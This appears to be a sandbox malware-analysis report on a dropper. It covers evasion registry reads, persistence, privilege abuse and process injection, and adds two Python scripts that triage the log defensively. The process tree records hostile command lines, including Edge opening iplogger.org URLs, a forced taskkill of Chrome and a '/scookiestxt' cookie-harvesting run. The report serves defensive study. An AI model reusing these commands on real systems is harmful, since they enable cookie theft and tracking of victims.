  Key value queried     \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Configuration Data     3C5chxgmdIM7FCOvWctXQCVO.exe
  Key enumerated        \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor                          3C5chxgmdIM7FCOvWctXQCVO.exe
  Key value queried     \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision        3C5chxgmdIM7FCOvWctXQCVO.exe
  Key opened            \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1                        3C5chxgmdIM7FCOvWctXQCVO.exe
  Key value queried     \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier             3C5chxgmdIM7FCOvWctXQCVO.exe
  Key value queried     \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString    LuC7opz56ZHv9DMKAzniWXla.exe
  Key opened            \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0                        8yNuAlksxt9ERCQBLnTf5R7s.exe
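The registry reads in this section, in "Checks BIOS information in registry", "Checks SCSI registry key(s)", the EnableLUA lookups and the Geo\Nation lookups in "Checks computer location settings" are individually unremarkable (msedge.exe queries the BIOS keys too, as the "Enumerates system info in registry" section shows); they become a signal when one process combines several of them. The Python below is an added example, not code from this report or from Triage: it parses the `<action> <path> <process>` lines, maps each path to the category the signatures above describe (BIOS, SCSI, CPU, geofence, UAC check) and flags a process once it touches two or more categories. The sample lines are copied from this report except the last, a constructed explorer.exe Run-key read that must fall through unclassified. The category regexes and the threshold of two are assumptions of the example.

```python
import re
from collections import defaultdict

# Registry-access lines in the report's "<action> <path> <process>" shape.
# All but the last are copied from this report; the last is a constructed benign line.
SAMPLE_EVENTS = [
    r"Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe",
    r"Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion PGrgYrmjIUuPTUnxq9jnhp_9.exe",
    r"Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation build.exe",
    r"Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI pub2.exe",
    r"Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 3C5chxgmdIM7FCOvWctXQCVO.exe",
    r"Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA PGrgYrmjIUuPTUnxq9jnhp_9.exe",
    r"Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe",
    # constructed benign line: explorer.exe reading a Run value must not be classified
    r"Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OneDrive explorer.exe",
]

# Registry paths may contain spaces ("Platform Specific Field 1"), the process name never does,
# so the path is matched non-greedily and the process is the last whitespace-free token.
EVENT_RE = re.compile(r"^(Key(?: value)? (?:queried|opened|enumerated|created)) (\\REGISTRY\\.+?) (\S+)$")

# Category rules (assumptions of this example, modelled on the signature names in the report).
RULES = [
    ("anti_sandbox:bios", re.compile(r"\\HARDWARE\\DESCRIPTION\\System\\(SystemBiosVersion|VideoBiosVersion|BIOS\b)", re.IGNORECASE)),
    ("anti_sandbox:scsi", re.compile(r"\\SYSTEM\\ControlSet\d+\\Enum\\SCSI", re.IGNORECASE)),
    ("anti_sandbox:cpu", re.compile(r"\\HARDWARE\\DESCRIPTION\\System\\CentralProcessor", re.IGNORECASE)),
    ("geofence", re.compile(r"\\Control Panel\\International\\Geo\\Nation$", re.IGNORECASE)),
    ("uac_check", re.compile(r"\\Policies\\System\\EnableLUA$", re.IGNORECASE)),
]


def parse_event(line: str):
    """Split a line into (action, path, process); None if it is not a registry event."""
    m = EVENT_RE.match(line)
    return m.groups() if m else None


def classify(line: str):
    """Return (process, category) for a line that hits a rule, else None."""
    parsed = parse_event(line)
    if parsed is None:
        return None
    _, path, process = parsed
    for label, rx in RULES:
        if rx.search(path):
            return process, label
    return None


def triage(lines) -> dict:
    """Map each process to the sorted list of distinct categories it touched."""
    hits = defaultdict(set)
    for line in lines:
        hit = classify(line)
        if hit:
            hits[hit[0]].add(hit[1])
    return {proc: sorted(labels) for proc, labels in hits.items()}


def evasive_processes(report: dict, threshold: int = 2) -> list:
    """Processes that combine at least `threshold` distinct categories (assumed cut-off)."""
    return sorted(proc for proc, labels in report.items() if len(labels) >= threshold)


if __name__ == "__main__":
    summary = triage(SAMPLE_EVENTS)
    for proc, labels in sorted(summary.items()):
        print(f"{proc:40} {', '.join(labels)}")
    print("evasive:", evasive_processes(summary))
```

On the sample, only PGrgYrmjIUuPTUnxq9jnhp_9.exe crosses the threshold (BIOS read plus the EnableLUA check); feeding it the full tables from this page raises the same process further, since it also queries both BIOS values. The threshold is deliberately conservative because a single BIOS or CPU read is ordinary telemetry behaviour, as the msedge.exe line shows.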
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
  pid   process
  5224  schtasks.exe
  3404  schtasks.exe
  944   schtasks.exe
Delays execution with timeout.exe 1 IoCs
Processes:
  pid   process
  5508  timeout.exe
Enumerates processes with tasklist 1 TTPs 2 IoCs
Processes:
  pid   process
  1160  tasklist.exe
  6336  tasklist.exe
Enumerates system info in registry 2 TTPs 5 IoCs
Processes:
  description        ioc                                                                process
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer  msedge.exe
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName   msedge.exe
  Key opened         \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS                     Install.exe
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName   Install.exe
  Key opened         \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS                     msedge.exe
Kills process with taskkill 3 IoCs
Processes:
  pid   process
  1072  taskkill.exe
  5336  taskkill.exe
  1924  taskkill.exe
Modifies registry class 5 IoCs
Processes:
  description  ioc                                                                                                        process
  Key created  \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\                  msedge.exe
  Key created  \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\                  (process not recorded)
  Key created  \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\                  (process not recorded)
  Key created  \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\  (process not recorded)
  Key created  \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\      Folder.exe
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
  pid   process                      entries
  1252  pub2.exe                     2
  1828  msedge.exe                   2
  1848  msedge.exe                   2
  5060  jfiag3g_gg.exe               2
  3032  (process name not recorded)  56
Suspicious behavior: MapViewOfSection 2 IoCs
Processes:
  pid   process
  1252  pub2.exe
  6912  Lxjwaytgkwrfchptbandzip.exe
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 5 IoCs
Processes:
  pid   process     entries
  1848  msedge.exe  5
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
  pid   process            tokens
  5004  KRSetp.exe         SeDebugPrivilege
  4932  Installation.exe   SeCreateTokenPrivilege, SeAssignPrimaryTokenPrivilege, SeLockMemoryPrivilege, SeIncreaseQuotaPrivilege, SeMachineAccountPrivilege, SeTcbPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeSystemEnvironmentPrivilege, SeChangeNotifyPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeSyncAgentPrivilege, SeEnableDelegationPrivilege, SeManageVolumePrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, 31, 32, 33, 34, 35 (34 entries)
  1072  taskkill.exe       SeDebugPrivilege
  3032  (process name not recorded)  SeShutdownPrivilege and SeCreatePagefilePrivilege, alternating (28 entries)
Suspicious use of FindShellTrayWindow 40 IoCs
Processes:
  pid   process                      entries
  1964  File.exe                     19
  1848  msedge.exe                   3
  3032  (process name not recorded)  15
  224   Accostarmi.exe.pif           3
Suspicious use of SendNotifyMessage 22 IoCs
Processes:
  pid   process             entries
  1964  File.exe            19
  224   Accostarmi.exe.pif  3
Suspicious use of SetWindowsHookEx 27 IoCs
Processes:
  pid   process
  4708  Info.exe
  5148  LuC7opz56ZHv9DMKAzniWXla.exe
  5252  Gzkt5mHpxF1v1F6ko7n6Ojln.exe
  5316  8yNuAlksxt9ERCQBLnTf5R7s.exe
  5408  3C5chxgmdIM7FCOvWctXQCVO.exe
  5308  powershell.EXE
  5600  QwtjZdfAu0PgtINFi4Nvj66n.exe
  5704  OXTwCzYYERQoTolMsvuosWem.exe
  5512  HxMqtYZIUVTsFBvCoEA3Pki_.exe
  5688  k3wOXzGlwzQprfZ7dKwqK6sN.exe
  5672  zhD7lRTUvJmwo8erfpdnVTWv.exe
  5548  thSjL5N0VAxIgAXhHP6f09aM.exe
  5532  find.exe
  5648  AMmh7Hp1kuB7JaUBXLLtucDo.exe
  5520  PGrgYrmjIUuPTUnxq9jnhp_9.exe
  5720  z63VCPkRi8gB3YlO5uw17UaM.exe
  5680  4E1sEd5y60BTJLCX9pPJHvn6.exe
  6380  AppLaunch.exe
  6264  Install.exe
  6400  zhD7lRTUvJmwo8erfpdnVTWv.exe
  5188  Install.exe
  6140  dada.exe
  5832  dada.exe
  2328  build.exe
  2456  build.exe
  5208  bkkimcju.exe
  224   Accostarmi.exe.pif
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
description pid process target process
(Identical rows are collapsed; the number of logged calls is given per row.)
PID 1852 wrote to memory of 2556 (7d833f03931de8957a7c6bc932b6ccc7984e377fa98b59e631a73b86b83af135.exe -> Files.exe), 3 calls
PID 1852 wrote to memory of 3320 (7d833f03931de8957a7c6bc932b6ccc7984e377fa98b59e631a73b86b83af135.exe -> Install.exe), 3 calls
PID 1852 wrote to memory of 5004 (7d833f03931de8957a7c6bc932b6ccc7984e377fa98b59e631a73b86b83af135.exe -> KRSetp.exe), 2 calls
PID 1852 wrote to memory of 4468 (7d833f03931de8957a7c6bc932b6ccc7984e377fa98b59e631a73b86b83af135.exe -> jg3_3uag.exe), 3 calls
PID 2556 wrote to memory of 1964 (Files.exe -> File.exe), 3 calls
PID 1852 wrote to memory of 1848 (7d833f03931de8957a7c6bc932b6ccc7984e377fa98b59e631a73b86b83af135.exe -> msedge.exe), 2 calls
PID 1848 wrote to memory of 1404 (msedge.exe -> msedge.exe), 2 calls
PID 1852 wrote to memory of 1880 (7d833f03931de8957a7c6bc932b6ccc7984e377fa98b59e631a73b86b83af135.exe -> Folder.exe), 3 calls
PID 1852 wrote to memory of 4932 (7d833f03931de8957a7c6bc932b6ccc7984e377fa98b59e631a73b86b83af135.exe -> Installation.exe), 3 calls
PID 1852 wrote to memory of 4864 (7d833f03931de8957a7c6bc932b6ccc7984e377fa98b59e631a73b86b83af135.exe -> pzyh.exe), 3 calls
PID 1852 wrote to memory of 1252 (7d833f03931de8957a7c6bc932b6ccc7984e377fa98b59e631a73b86b83af135.exe -> pub2.exe), 3 calls
PID 1852 wrote to memory of 4708 (7d833f03931de8957a7c6bc932b6ccc7984e377fa98b59e631a73b86b83af135.exe -> Info.exe), 3 calls
PID 4864 wrote to memory of 3364 (pzyh.exe -> jfiag3g_gg.exe), 3 calls
PID 4932 wrote to memory of 4152 (Installation.exe -> cmd.exe), 3 calls
PID 1848 wrote to memory of 4588 (msedge.exe -> msedge.exe), 25 calls
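The "wrote to memory" rows are easier to reason about as writer -> target edges than as a flat list. The parser below is an added example for this page, not part of the sandbox report; its input is a constructed excerpt of the rows above, and it assumes every row has the shape `PID <pid> wrote to memory of <target> <pid> <image> <target image>` that the report uses. The msedge.exe -> msedge.exe rows come from the browser launching its own child processes and can be filtered out by image name; the chains rooted at the dropper are the ones to follow.

```python
"""Turn the flattened 'wrote to memory' rows into writer -> target edges and chains.

Added example for this page; not part of the sandbox report. The input text is a
constructed excerpt of the rows above, and ROW assumes the row shape
'PID <pid> wrote to memory of <target> <pid> <image> <target image>'.
"""
import re
from collections import Counter

ROW = re.compile(r"PID (\d+) wrote to memory of (\d+) \1 (\S+) (\S+)")

# Constructed excerpt of the flattened table above (same row shape, fewer rows).
SAMPLE_ROWS = (
    "PID 1852 wrote to memory of 2556 1852 7d833f03931de8957a7c6bc932b6ccc7984e377fa98b59e631a73b86b83af135.exe Files.exe "
    "PID 1852 wrote to memory of 2556 1852 7d833f03931de8957a7c6bc932b6ccc7984e377fa98b59e631a73b86b83af135.exe Files.exe "
    "PID 2556 wrote to memory of 1964 2556 Files.exe File.exe "
    "PID 1848 wrote to memory of 1404 1848 msedge.exe msedge.exe "
    "PID 1848 wrote to memory of 1404 1848 msedge.exe msedge.exe "
    "PID 4932 wrote to memory of 4152 4932 Installation.exe cmd.exe"
)


def memory_write_edges(text):
    """Return {(writer_pid, writer_image, target_pid, target_image): call_count}."""
    return Counter((int(w), wi, int(t), ti) for w, t, wi, ti in ROW.findall(text))


def injection_chains(edges):
    """Root-to-leaf chains of writer -> target as 'pid:image' strings.

    Roots are writers that are never themselves a target. Assumes the edges form
    a tree, which is what a process-spawn log produces.
    """
    image, kids = {}, {}
    for w, wi, t, ti in edges:
        image[w], image[t] = wi, ti
        kids.setdefault(w, set()).add(t)
    roots = sorted(set(kids) - {t for _, _, t, _ in edges})
    chains = []

    def walk(pid, path):
        path = path + [f"{pid}:{image[pid]}"]
        if pid in kids:
            for child in sorted(kids[pid]):
                walk(child, path)
        else:
            chains.append(" -> ".join(path))

    for root in roots:
        walk(root, [])
    return chains


if __name__ == "__main__":
    edges = memory_write_edges(SAMPLE_ROWS)
    for (w, wi, t, ti), n in sorted(edges.items()):
        print(f"{w} {wi} -> {t} {ti}: {n} call(s)")
    for chain in injection_chains(edges):
        print(chain)
```

Running it on the full table above (paste the rows into `SAMPLE_ROWS`) gives one chain per dropped executable plus the browser's own launch chain, and the per-edge counts show which pairs the sandbox logged repeatedly.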
Processes
-
C:\Users\Admin\AppData\Local\Temp\7d833f03931de8957a7c6bc932b6ccc7984e377fa98b59e631a73b86b83af135.exe"C:\Users\Admin\AppData\Local\Temp\7d833f03931de8957a7c6bc932b6ccc7984e377fa98b59e631a73b86b83af135.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Files.exe"C:\Users\Admin\AppData\Local\Temp\Files.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\File.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\File.exe"3⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1Rxji73⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe63fa46f8,0x7ffe63fa4708,0x7ffe63fa47184⤵
-
C:\Users\Admin\AppData\Local\Temp\Install.exe"C:\Users\Admin\AppData\Local\Temp\Install.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3320 -s 6243⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3320 -s 6443⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3320 -s 6523⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3320 -s 7483⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3320 -s 8203⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3320 -s 10203⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3320 -s 10363⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3320 -s 13563⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3320 -s 6323⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3320 -s 18523⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\KRSetp.exe"C:\Users\Admin\AppData\Local\Temp\KRSetp.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\jg3_3uag.exe"C:\Users\Admin\AppData\Local\Temp\jg3_3uag.exe"2⤵
- Executes dropped EXE
- Checks whether UAC is enabled
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1wNij72⤵
- Adds Run key to start application
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe63fa46f8,0x7ffe63fa4708,0x7ffe63fa47183⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2092,11141644064019444893,15341445896857796746,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2164 /prefetch:23⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2092,11141644064019444893,15341445896857796746,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2208 /prefetch:33⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2092,11141644064019444893,15341445896857796746,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2668 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,11141644064019444893,15341445896857796746,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3608 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,11141644064019444893,15341445896857796746,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3616 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2092,11141644064019444893,15341445896857796746,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5288 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,11141644064019444893,15341445896857796746,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5416 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,11141644064019444893,15341445896857796746,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5448 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,11141644064019444893,15341445896857796746,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3840 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2092,11141644064019444893,15341445896857796746,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3780 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings3⤵
- Drops file in Program Files directory
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x228,0x22c,0x230,0x1fc,0x234,0x7ff621275460,0x7ff621275470,0x7ff6212754804⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2092,11141644064019444893,15341445896857796746,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3780 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2092,11141644064019444893,15341445896857796746,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3424 /prefetch:23⤵
-
C:\Users\Admin\AppData\Local\Temp\Folder.exe"C:\Users\Admin\AppData\Local\Temp\Folder.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
- Modifies registry class
-
C:\Windows\SysWOW64\rUNdlL32.eXe"C:\Windows\system32\rUNdlL32.eXe" "C:\Users\Admin\AppData\Local\Temp\axhub.dll",axhub3⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3340 -s 6084⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\Installation.exe"C:\Users\Admin\AppData\Local\Temp\Installation.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\pzyh.exe"C:\Users\Admin\AppData\Local\Temp\pzyh.exe"2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\pub2.exe"C:\Users\Admin\AppData\Local\Temp\pub2.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\Info.exe"C:\Users\Admin\AppData\Local\Temp\Info.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Documents\LuC7opz56ZHv9DMKAzniWXla.exe"C:\Users\Admin\Documents\LuC7opz56ZHv9DMKAzniWXla.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Documents\RxWV8a03ZV04XB88tc2CXbRj.exe"C:\Users\Admin\Documents\RxWV8a03ZV04XB88tc2CXbRj.exe"3⤵
- Executes dropped EXE
- Checks computer location settings
- Adds Run key to start application
-
C:\Users\Admin\AppData\Local\Temp\dada.exe"C:\Users\Admin\AppData\Local\Temp\dada.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\build.exe"C:\Users\Admin\AppData\Local\Temp\build.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
